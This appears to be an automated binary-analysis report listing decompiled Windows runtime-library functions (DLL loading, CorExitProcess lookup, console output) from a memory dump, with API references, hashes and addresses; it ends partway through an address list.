                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BDD62, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4BDD62(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6e4fb208 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6e4f2ec8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6E4BF838(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}













                          0x6e4bdd69
                          0x6e4bdddd
                          0x6e4bdd6e
                          0x6e4bdd70
                          0x6e4bdd77
                          0x6e4bdd7b
                          0x6e4bdd84
                          0x6e4bdd93
                          0x6e4bdd9c
                          0x6e4bdda0
                          0x6e4bdde9
                          0x6e4bddeb
                          0x6e4bddef
                          0x6e4bddf2
                          0x6e4bddf2
                          0x6e4bddf8
                          0x6e4bddf8
                          0x6e4bdde4
                          0x6e4bdde8
                          0x6e4bdde8
                          0x6e4bdda2
                          0x6e4bddab
                          0x6e4bddd5
                          0x6e4bddd8
                          0x6e4bddda
                          0x6e4bddda
                          0x00000000
                          0x6e4bddda
                          0x6e4bddad
                          0x6e4bddb8
                          0x6e4bddbd
                          0x6e4bddc2
                          0x00000000
                          0x00000000
                          0x6e4bddc9
                          0x6e4bddcf
                          0x6e4bddd3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bddd3
                          0x6e4bdd80
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bdd82
                          0x6e4bdde2
                          0x00000000

                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,?,6E4BDE23,00000000,?,00000001,00000000,?,6E4BDE9A,00000001,FlsFree,6E4F2F84,FlsFree,00000000), ref: 6E4BDDF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-
                          • API String ID: 3664257935-2084034818
                          • Opcode ID: ab0d608179c3fced654d67795592a1f26f9e5a993d99f75398df75276fbe7f45
                          • Instruction ID: 02b42c2d34313b7acc24eaa9946d4edf2e4f92970256acbd0c096e4521f6d080
                          • Opcode Fuzzy Hash: ab0d608179c3fced654d67795592a1f26f9e5a993d99f75398df75276fbe7f45
                          • Instruction Fuzzy Hash: 5911E732A616259BDF125AF99C44F4A3768AF02B60F1101A2E851A7384DB70E9018AF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BEC2D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 25%
                          			E6E4BEC2D(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x6e4fa4a4; // 0xf06451cf
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E6E4C7473, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x6e4c8154(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                          0x6e4bec42
                          0x6e4bec4d
                          0x6e4bec53
                          0x6e4bec57
                          0x6e4bec62
                          0x6e4bec6a
                          0x6e4bec74
                          0x6e4bec7a
                          0x6e4bec7e
                          0x6e4bec85
                          0x6e4bec8b
                          0x6e4bec8b
                          0x6e4bec7e
                          0x6e4bec91
                          0x6e4bec96
                          0x6e4bec96
                          0x6e4bec9f
                          0x6e4beca9

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F06451CF,00000000,?,00000000,6E4C7473,000000FF,?,6E4BEBBD,?,?,6E4BEB91,?), ref: 6E4BEC62
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4BEC74
                          • FreeLibrary.KERNEL32(00000000,?,00000000,6E4C7473,000000FF,?,6E4BEBBD,?,?,6E4BEB91,?), ref: 6E4BEC96
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: e4b78ab14afdcbb03bffc7516c086e10244dfff1c87f60a8628450bacaae017d
                          • Instruction ID: c71a381e40bf09358d602b2f4ad65eef4e33e444bbb5d1ea34043afdefcab577
                          • Opcode Fuzzy Hash: e4b78ab14afdcbb03bffc7516c086e10244dfff1c87f60a8628450bacaae017d
                          • Instruction Fuzzy Hash: 3F016776904959EFDF019FB1DD48FAFBBB9FB49B10F010526E811A6390DB74A500CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC440, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4AC440() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "SetThreadDescription");
				}
			}




                          0x6e4ac445
                          0x6e4ac44d
                          0x6e4ac45c
                          0x6e4ac44f
                          0x6e4ac45b
                          0x6e4ac45b

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6E4AC445
                          • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6E4AC455
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: SetThreadDescription$kernel32
                          • API String ID: 1646373207-1950310818
                          • Opcode ID: 93455dad4fd418f11476668a25f824b1abd28911881a278ea37f57e4abc6d163
                          • Instruction ID: fe33827555893c98b3d72b00fa66d6e15c847f483a26ba813138356b075e0e2f
                          • Opcode Fuzzy Hash: 93455dad4fd418f11476668a25f824b1abd28911881a278ea37f57e4abc6d163
                          • Instruction Fuzzy Hash: 60B092B9604D4167AE90BFFB5D1CE273A59EAA9A627034446AA12DA600CA209000A961
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC420, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4AC420() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "GetSystemTimePreciseAsFileTime");
				}
			}




                          0x6e4ac425
                          0x6e4ac42d
                          0x6e4ac43c
                          0x6e4ac42f
                          0x6e4ac43b
                          0x6e4ac43b

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6E4AC425
                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6E4AC435
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetSystemTimePreciseAsFileTime$kernel32
                          • API String ID: 1646373207-392834919
                          • Opcode ID: 56433d134a8a1bd62ef16c50867d4c421d16644d65a7866136bc9751b6557a2c
                          • Instruction ID: f6e05170b4f87920d4d6d2e0f2d62ed03e75bf87ee363a68bb35f80fc5297b33
                          • Opcode Fuzzy Hash: 56433d134a8a1bd62ef16c50867d4c421d16644d65a7866136bc9751b6557a2c
                          • Instruction Fuzzy Hash: 7FB09275604D4266AE90BFFB5A0CE2B391AAAE5A627034446A512DAB05CA20A000A921
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC4C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4AC4C0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtCreateKeyedEvent");
				}
			}




                          0x6e4ac4c5
                          0x6e4ac4cd
                          0x6e4ac4dc
                          0x6e4ac4cf
                          0x6e4ac4db
                          0x6e4ac4db

                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6E4AC4C5
                          • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6E4AC4D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtCreateKeyedEvent$ntdll
                          • API String ID: 1646373207-1373576770
                          • Opcode ID: 0e5264b6b457a604d2c2ea33d730c4519d78b97ccefe1c7ee0e921dfb7a651d5
                          • Instruction ID: 52de050253735e85b1dcaa814322e9fc29d44ea23edbd33971d66220b826cc71
                          • Opcode Fuzzy Hash: 0e5264b6b457a604d2c2ea33d730c4519d78b97ccefe1c7ee0e921dfb7a651d5
                          • Instruction Fuzzy Hash: 47B09B75504541665D94BEF35D0CD163615568571670144456116D7940C6109400E925
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC480, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4AC480() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtWaitForKeyedEvent");
				}
			}




                          0x6e4ac485
                          0x6e4ac48d
                          0x6e4ac49c
                          0x6e4ac48f
                          0x6e4ac49b
                          0x6e4ac49b

                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6E4AC485
                          • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6E4AC495
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtWaitForKeyedEvent$ntdll
                          • API String ID: 1646373207-2815205136
                          • Opcode ID: 670749a1110556f2b54bf36b7aa5fd1dc03831b241aba5c145fb0791183f31d5
                          • Instruction ID: 5239f587098cbb9c40a9054e03ae50cf530551060e6e0ec09a9e2cd01099a2e0
                          • Opcode Fuzzy Hash: 670749a1110556f2b54bf36b7aa5fd1dc03831b241aba5c145fb0791183f31d5
                          • Instruction Fuzzy Hash: 28B09279A08A41669E94FFF3690CE163A28AA85A26B024456A11ADA640CA20E000ED26
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC4A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4AC4A0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtReleaseKeyedEvent");
				}
			}




                          0x6e4ac4a5
                          0x6e4ac4ad
                          0x6e4ac4bc
                          0x6e4ac4af
                          0x6e4ac4bb
                          0x6e4ac4bb

                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6E4AC4A5
                          • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6E4AC4B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtReleaseKeyedEvent$ntdll
                          • API String ID: 1646373207-31681898
                          • Opcode ID: d9e2bc664da6188f48357794100f9f0d0dd6cce28cb28a7f3e1e7e8b2805257d
                          • Instruction ID: 0e4756af5acbe6c153dac5bc7f5dda137521a90c499e2d7897935c63c4447466
                          • Opcode Fuzzy Hash: d9e2bc664da6188f48357794100f9f0d0dd6cce28cb28a7f3e1e7e8b2805257d
                          • Instruction Fuzzy Hash: B0B092B5A08941669E94BEF36D0CE163A28AA95A27B02444AA516DA640EA24A400E925
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C4089, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E6E4C4089(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(E6E4C74CA);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x6e4fa4a4; // 0xf06451cf
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x6e4fb5e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E6E4BF760(_t265, _t291, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x6e4fb5e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x6e4fb5e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x6e4fb5e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E6E4C2A23(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E6E4C2A23(_t273, _t292);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x6e4fabf0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x6e4fb5e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E6E4C4CEF( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x6e4fabf0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x6e4fb5e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E6E4BAE10( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x6e4fb5e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E6E4C4CEF( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E6E4C19B3(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E6E4BA057(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































                          0x6e4c408e
                          0x6e4c4090
                          0x6e4c409b
                          0x6e4c409c
                          0x6e4c409f
                          0x6e4c40a4
                          0x6e4c40a6
                          0x6e4c40ac
                          0x6e4c40b0
                          0x6e4c40b6
                          0x6e4c40bb
                          0x6e4c40c1
                          0x6e4c40c4
                          0x6e4c40c7
                          0x6e4c40ca
                          0x6e4c40cd
                          0x6e4c40d0
                          0x6e4c40da
                          0x6e4c40e1
                          0x6e4c40e9
                          0x6e4c40ec
                          0x6e4c40f2
                          0x6e4c40f6
                          0x6e4c40f9
                          0x6e4c40fd
                          0x6e4c40fd
                          0x6e4c4105
                          0x6e4c410d
                          0x6e4c4112
                          0x6e4c4113
                          0x6e4c4114
                          0x6e4c4115
                          0x6e4c4118
                          0x6e4c411a
                          0x6e4c4120
                          0x6e4c4126
                          0x6e4c4129
                          0x6e4c412b
                          0x6e4c412e
                          0x6e4c4137
                          0x6e4c413d
                          0x6e4c4140
                          0x6e4c4147
                          0x6e4c414e
                          0x6e4c4151
                          0x6e4c428b
                          0x6e4c428f
                          0x6e4c4292
                          0x6e4c42b5
                          0x6e4c42bb
                          0x6e4c42bd
                          0x6e4c42c1
                          0x6e4c42f2
                          0x6e4c42f5
                          0x6e4c42f7
                          0x00000000
                          0x6e4c42c3
                          0x6e4c42c3
                          0x6e4c42c6
                          0x6e4c42c9
                          0x6e4c42cc
                          0x6e4c4416
                          0x6e4c4424
                          0x6e4c442d
                          0x6e4c42d2
                          0x6e4c42dc
                          0x6e4c42e1
                          0x6e4c42e4
                          0x6e4c42e7
                          0x6e4c42ed
                          0x00000000
                          0x6e4c42ed
                          0x6e4c42e7
                          0x6e4c42cc
                          0x6e4c4294
                          0x6e4c429b
                          0x6e4c429e
                          0x6e4c42a1
                          0x6e4c42a3
                          0x6e4c42a6
                          0x6e4c42ad
                          0x6e4c42af
                          0x6e4c42f8
                          0x6e4c42fb
                          0x6e4c42fc
                          0x6e4c4301
                          0x6e4c4304
                          0x6e4c4307
                          0x6e4c430d
                          0x00000000
                          0x6e4c430d
                          0x6e4c4307
                          0x6e4c4157
                          0x6e4c415a
                          0x6e4c415c
                          0x6e4c415e
                          0x6e4c4162
                          0x6e4c4163
                          0x6e4c4167
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4c4167
                          0x6e4c416c
                          0x6e4c416e
                          0x6e4c4173
                          0x6e4c4233
                          0x6e4c423a
                          0x6e4c423b
                          0x6e4c423e
                          0x6e4c4240
                          0x6e4c43f0
                          0x6e4c43f2
                          0x00000000
                          0x6e4c43f4
                          0x6e4c43f4
                          0x6e4c43f7
                          0x6e4c4406
                          0x6e4c440a
                          0x6e4c440b
                          0x6e4c440b
                          0x00000000
                          0x6e4c440f
                          0x00000000
                          0x6e4c4246
                          0x6e4c424b
                          0x6e4c424e
                          0x6e4c4251
                          0x6e4c4257
                          0x6e4c4260
                          0x6e4c426b
                          0x6e4c4270
                          0x6e4c4273
                          0x6e4c4276
                          0x6e4c427f
                          0x6e4c427f
                          0x6e4c4282
                          0x00000000
                          0x6e4c4282
                          0x6e4c4276
                          0x6e4c4179
                          0x6e4c417c
                          0x6e4c4182
                          0x6e4c4184
                          0x6e4c4191
                          0x6e4c4192
                          0x6e4c4195
